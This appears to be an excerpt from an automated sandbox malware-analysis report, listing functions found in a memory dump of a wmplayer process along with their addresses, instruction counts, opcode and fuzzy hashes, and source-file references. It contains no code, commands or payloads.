                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aa50c1d37f3560bffd36062823943dd39c58e9dccf197bbb141716ea80c12619
                                              • Instruction ID: d99bbde6a9fe89ed2828f5a5323fb2f0ed984135e5101d779633567ea08d7996
                                              • Opcode Fuzzy Hash: aa50c1d37f3560bffd36062823943dd39c58e9dccf197bbb141716ea80c12619
                                              • Instruction Fuzzy Hash: 5C21CF729043459FC725EFA9D984F5BFBECAF90740F080466BD808B251D771C944C6A2
                                              Function 0334D0C0 Relevance: .1, Instructions: 73COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                              • Instruction ID: 5b1c6e2c8f0c02368f86a4093db583e0fe7bdf09fdca271d1bfcd2605992459e
                                              • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                              • Instruction Fuzzy Hash: D221C272644700ABD311DF18CC81B5BBBE5EF89720F14052EF9499B3A1D374E80087A9
                                              Function 0330A30B Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e1bd9ee1e4bf5b6d1fe237dce5ba3b14930bd9b65a201ce32f13bedc22d0356
                                              • Instruction ID: 0e7668b144f460533c9866054a2e846b14e5fb635982aa0fce5a294f5f3b9272
                                              • Opcode Fuzzy Hash: 8e1bd9ee1e4bf5b6d1fe237dce5ba3b14930bd9b65a201ce32f13bedc22d0356
                                              • Instruction Fuzzy Hash: 0B217F392107509FC725DF29CD41B56B3F5AF48704F1884A8E519CBB51E331E842CB94
                                              Function 032CB765 Relevance: .1, Instructions: 69COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 423a01669490822d9a3f4fd61d4589dd8f33e99852ec1cc409cbfc1c67e9342f
                                              • Instruction ID: 6b30475f767fd36b95ddd69b0a29901f9f0b62a187b525c2c4155156412ef3cd
                                              • Opcode Fuzzy Hash: 423a01669490822d9a3f4fd61d4589dd8f33e99852ec1cc409cbfc1c67e9342f
                                              • Instruction Fuzzy Hash: F6216B36120740DFCB25EF68D982F1AB7B9FF08705F184A6CE1069B661C774E894CB44
                                              Function 03300124 Relevance: .1, Instructions: 68COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                              • Instruction ID: df280f607cd581747bc648c3c5d68eaf44c2ffed9347c865851f7f7afe346904
                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                              • Instruction Fuzzy Hash: 3D11E27A601704BFD72ADB44CC91F9AB7B9EB80754F140029E6048F1C0D671EE44CB90
                                              Function 032D8770 Relevance: .1, Instructions: 68COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5af3af9bdfe3de6f2919e3d0e59043a1bb21838de2f6733d725c8286aaa6fe15
                                              • Instruction ID: 6b0aa0da1af7e5cde5253a78d9f055c9c22a89b3d8abbeb29c7d714a9c40a4ce
                                              • Opcode Fuzzy Hash: 5af3af9bdfe3de6f2919e3d0e59043a1bb21838de2f6733d725c8286aaa6fe15
                                              • Instruction Fuzzy Hash: 1511C43A7207269BDB12CF4AC4C0A5AF7E9AF8A711B1C406DED08DF205D7B2D941C790
                                              Function 032D3720 Relevance: .1, Instructions: 67COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04776146d0701c388ce73d7238b946d01d58c682665a99db057d964acd942e75
                                              • Instruction ID: 5c155cb87d0024c4a718d9d29c561e49e1a358d32ed7c2e9efbb882770889cca
                                              • Opcode Fuzzy Hash: 04776146d0701c388ce73d7238b946d01d58c682665a99db057d964acd942e75
                                              • Instruction Fuzzy Hash: DF21D779A2070A8BF715DF5DC4887EDB7B8FB88318F2D8018D951572D0CBB89985CB51
                                              Function 032D80E9 Relevance: .1, Instructions: 66COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 12be1522d6c9fd9990d8ce35156c25230810c573f8712d3ac7c7b983fd35a0a8
                                              • Instruction ID: 38915006acf6aa3cb2e1c8cbac0a9932ba20122e9e2af3eb8bf8ab723bff60b3
                                              • Opcode Fuzzy Hash: 12be1522d6c9fd9990d8ce35156c25230810c573f8712d3ac7c7b983fd35a0a8
                                              • Instruction Fuzzy Hash: 3B215B75A10206DFCB14CF98C581AAEBBB5FB89718F2441ADD105AB350CB71ED4ACBD0
                                              Function 0330674D Relevance: .1, Instructions: 65COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d6d741832e405362cbf28b636749e21df99a610772d2c3e88ac89f1707124ebd
                                              • Instruction ID: 411b1a518c31175770496522bc9fa6cab1e837d360ca0d8d12c922897ee65c2f
                                              • Opcode Fuzzy Hash: d6d741832e405362cbf28b636749e21df99a610772d2c3e88ac89f1707124ebd
                                              • Instruction Fuzzy Hash: 5B218E75610B00EFC720CF69C8D2B66B3F8FF84650F44882DE59AC7690DA71B860CB60
                                              Function 032C9240 Relevance: .1, Instructions: 64COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 779116213006bf87dc5397c7b80a5505f1ed2bd06fb6478c0b1ab3c772ca3230
                                              • Instruction ID: 605f71b570b9d567d17cfbefe5d171a14293f798c779520dc3e28fe359dd933b
                                              • Opcode Fuzzy Hash: 779116213006bf87dc5397c7b80a5505f1ed2bd06fb6478c0b1ab3c772ca3230
                                              • Instruction Fuzzy Hash: 7011E27E030240AAD725FF51D882A72BBACEF58B90F188029E801DB254D338FD41CB65
                                              Function 033066B0 Relevance: .1, Instructions: 61COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c39531ecf33696e66e100f81cef1d9b418505a212d34b896f78b9cabb1b959b
                                              • Instruction ID: e20edd25c3cce184c5f0cea450dbac7ae054ab8d4636ab8f9ff24e2975c0dd0c
                                              • Opcode Fuzzy Hash: 7c39531ecf33696e66e100f81cef1d9b418505a212d34b896f78b9cabb1b959b
                                              • Instruction Fuzzy Hash: DC110176A10314DFCB25DF58C9D2A0ABBECEF84B00F094079E9069B358D670DC00CB90
                                              Function 032F27ED Relevance: .1, Instructions: 58COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e26d665cfa03c4eb98dd31814c7c27975e883a8fa57940fc45e719c3fd9fbf1
                                              • Instruction ID: 444da7af84bae62d63ee95d88f660dfface28ce32a44dbe4067b46d570479f2d
                                              • Opcode Fuzzy Hash: 9e26d665cfa03c4eb98dd31814c7c27975e883a8fa57940fc45e719c3fd9fbf1
                                              • Instruction Fuzzy Hash: BD010439625784AFE316E269ACA8F27A78CEF42350F0944B4FA408B290DA54DC40C2B1
                                              Function 032FB052 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 09672af1c393a82972cafacdc33a500e919e055c6f85016c98c824b45e7b4c21
                                              • Instruction ID: b6bdddd3215ff25a13631cad3c6903edeed92b409010ca8db405a1413b7fa204
                                              • Opcode Fuzzy Hash: 09672af1c393a82972cafacdc33a500e919e055c6f85016c98c824b45e7b4c21
                                              • Instruction Fuzzy Hash: 7C01D6B6B243006FD710EBA9DC81F6BF6E8DF88614F040038E705CB241EAB4E9448661
                                              Function 032D4690 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f6896e359878bae36fc25c482434957ffb4b71e963d8c4026e4ae7ffa1e9eb87
                                              • Instruction ID: 118d44f92598c38d4d42c3c1e5eee1ddd03f872a4bdf98e62ea5d05fee5091ce
                                              • Opcode Fuzzy Hash: f6896e359878bae36fc25c482434957ffb4b71e963d8c4026e4ae7ffa1e9eb87
                                              • Instruction Fuzzy Hash: EB11E536630745AFEB25EF5BD881F56B7A8EB86B64F184115F8148B650CB70F890CFA0
                                              Function 0338D6F0 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                              • Instruction ID: 33ac730d1adb76c279550e34943b244b567270eeb18a35450d0014b165d4804a
                                              • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                              • Instruction Fuzzy Hash: 2901AD7A700309EB9B14EFA6DA84DAFBBBDEF84A44F040019B901C7280E770EE41D760
                                              Function 03306620 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4147d3f497f8697c07653bb07c30669857784d18e468ffb881a5a70faf95ec5c
                                              • Instruction ID: 130733c8ff707d5bc30ffdc5de66fe89560bd46b897ae51430180ae028927fb1
                                              • Opcode Fuzzy Hash: 4147d3f497f8697c07653bb07c30669857784d18e468ffb881a5a70faf95ec5c
                                              • Instruction Fuzzy Hash: 6311E17AA10718ABCB21EF59CDD2B5EF7B8EF84741F580459E901AB244C770FD518BA0
                                              Function 032C7330 Relevance: .1, Instructions: 55COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a0fc7b307a295c4a02128141f041cc660169c79b0ec779a93ddfb2480e55a395
                                              • Instruction ID: d939c445b8262c58e95afd8dadd683824a13b875fcc1e1cc4771ca6e3c755fc7
                                              • Opcode Fuzzy Hash: a0fc7b307a295c4a02128141f041cc660169c79b0ec779a93ddfb2480e55a395
                                              • Instruction Fuzzy Hash: CB119A71620B45AFD721CF69C841BABB7E8FB44344F094A29E985CB210D775E880CBA0
                                              Function 032FF2D0 Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7889e9a2dacfdffe1862180d8b0b6ba1dfc6efe5b191cf050833fe87efeca5b0
                                              • Instruction ID: 35e8e77b419545155a77549a8941e190bfa6e68bfec43bcde48303743b73842f
                                              • Opcode Fuzzy Hash: 7889e9a2dacfdffe1862180d8b0b6ba1dfc6efe5b191cf050833fe87efeca5b0
                                              • Instruction Fuzzy Hash: 6511A075A10648AFC720DF69C984BAEF7E8FB44700F1800B6E605AB651D679E941C750
                                              Function 033672A0 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                              • Instruction ID: 8a2ec7004d5db551ddc5135c9b664faed516f13b5ed3aa91fe5f81fe9e95281f
                                              • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                              • Instruction Fuzzy Hash: E901D27A240605BFDB15EF15CCC0E53F77DFF84394B844925F24186560C721ECA0CAA0
                                              Function 032CA250 Relevance: .1, Instructions: 52COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                              • Instruction ID: b8fde758f46886326fa72c31a67d37eb16925ad7255b2bafd1d1ddf0f2eb4064
                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                              • Instruction Fuzzy Hash: B8010431435B6A9BCB20CF159C40A327BA8EB45764704866DF8958B280C331D460CBA1
                                              Function 032D6259 Relevance: .1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4cf76d989c85a1f9504bcb4003714776ea0612386bac0391b7e45c483fea9de8
                                              • Instruction ID: 75e2f63ce2a6517a9e573014d5b07544c46f6a587095bf8c0595f2c7efcdcaca
                                              • Opcode Fuzzy Hash: 4cf76d989c85a1f9504bcb4003714776ea0612386bac0391b7e45c483fea9de8
                                              • Instruction Fuzzy Hash: 0A117074941328ABDF29EB64CC82FEAB3B8AF04710F5485D4A315EA0E0D7709E91CF84
                                              Function 0334E1D0 Relevance: .1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e7a85d969e6e8f629fb22cffd7e3e3f0aa8692e0e53ff13fba2fb0322ee3c22
                                              • Instruction ID: f1d07fe01332e6bcdc1ea421f2e35864c17f230bb31f8b0e3d87015eb8ea0510
                                              • Opcode Fuzzy Hash: 8e7a85d969e6e8f629fb22cffd7e3e3f0aa8692e0e53ff13fba2fb0322ee3c22
                                              • Instruction Fuzzy Hash: 05118B36251740EFCB15EF18CD91F16B7B8FF48B44F2400A5E9059F6A1C275ED01CA90
                                              Function 032D208A Relevance: .0, Instructions: 50COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                              • Instruction ID: 368a836aaa651856fd5b35969b2baca01f7d59114c484e7ff46ee79c04a2d906
                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                              • Instruction Fuzzy Hash: DF012432620320CBDF10DA69E8C0BA2BB6AFFD4701F5949A5ED058F245DAB2C8C1C790
                                              Function 032CC020 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                              • Instruction ID: 7387a1d8d114fea7261cb6fba572792c975ca8bb9c3513db8879616a9fe212b7
                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                              • Instruction Fuzzy Hash: A3012832110B959FDB22D666C840FA7B7EDFFC4210F18491DA55A8B540DBB0E442C750
                                              Function 033120F0 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7b009da2e0536cae0bcf1c5f499e1ffea51205b66bc9632f0388ecc3f26fbe22
                                              • Instruction ID: d7dc459700739684d23618080cef48e5c5a588adf485a7b91f8857efbb1b4e91
                                              • Opcode Fuzzy Hash: 7b009da2e0536cae0bcf1c5f499e1ffea51205b66bc9632f0388ecc3f26fbe22
                                              • Instruction Fuzzy Hash: 34118075A0124CAFCB05EFA4C891FAFBBB9EB44340F0040A9F9059B250D735EE11CB90
                                              Function 032C9353 Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                              • Instruction ID: a5190eb295d4e5fddc3c0c3ad66d2edff5f1a8bf3d8d4943f836023de01a76f6
                                              • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                              • Instruction Fuzzy Hash: 88115B32930B52DFD721DF15C880B22B7E4BF40762F19896DE4994B5A5C775E8C1CB50
                                              Function 032F33A5 Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                              • Instruction ID: 4e7747ea9a9d020509ad13b0afb478ccb8486c176f3800927fc589c893ae65c0
                                              • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                              • Instruction Fuzzy Hash: 4301867A710605EFCB12DA9ADD40E5BFAAC9F84A40B154439BB15D7160EA70D981C760
                                              Function 0330D1D0 Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                              • Instruction ID: 29ea4c7de9bbd592bff96c83a8c20d655e69c80da0f812f02d152abdcbb3bae4
                                              • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                              • Instruction Fuzzy Hash: 4A01477AA01608ABD710DB98E890F7573EDEB84A20F144159FE158F2C0CB74D840C780
                                              Function 032C826B Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: baa3ca775134347f48f78b48b63e265336d9e83d463ff8e8a9554086086fb73e
                                              • Instruction ID: fd4b7dedfc9793acaa08435d9bdd295f3682db3739e6f306b657e514c21fefa2
                                              • Opcode Fuzzy Hash: baa3ca775134347f48f78b48b63e265336d9e83d463ff8e8a9554086086fb73e
                                              • Instruction Fuzzy Hash: CA01A735B30A88EFD704EB69DD94AAEB7B9EF40320F19812D9D01AB640DE70ED41C791
                                              Function 032EE016 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                              • Instruction ID: 1488aad61d8471b53ab13622c01654fe754ab7b51cd2e7c61a3183f1ef73d10e
                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                              • Instruction Fuzzy Hash: 70018F722246849FD326C71DC989F26BBDCEF44751F4E04A1F909DB691D778DD80C621
                                              Function 0338F367 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a6790f9dcf3f6f7632d93812d91890cd2f4ee679af9b16c964042e1ad8a21341
                                              • Instruction ID: 3a7d8ac4230a84cf98db0aa533461b5e9d93625b4cd26b3f1cbbebe79f9bad44
                                              • Opcode Fuzzy Hash: a6790f9dcf3f6f7632d93812d91890cd2f4ee679af9b16c964042e1ad8a21341
                                              • Instruction Fuzzy Hash: 9A018F75A10358ABDB14EBA9E895FAEBBB8EF44700F044066B501EF280D6B8D900CB94
                                              Function 0339972B Relevance: .0, Instructions: 44COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                              • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                              • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                              • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                              Function 033A5636 Relevance: .0, Instructions: 44COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7518211a11f8be04acee592094cc6ce1fe09e92d894e9fba19218aaf4ff3c0a5
                                              • Instruction ID: be47281fea12b891c6ee428008539d398d51557698f188c369a29e7a1c780d2a
                                              • Opcode Fuzzy Hash: 7518211a11f8be04acee592094cc6ce1fe09e92d894e9fba19218aaf4ff3c0a5
                                              • Instruction Fuzzy Hash: B9118078D10249EFCB04DFA9D481A9EB7B8FF08304F14805AB915EB351E774DA02CB54
                                              Function 032CC310 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
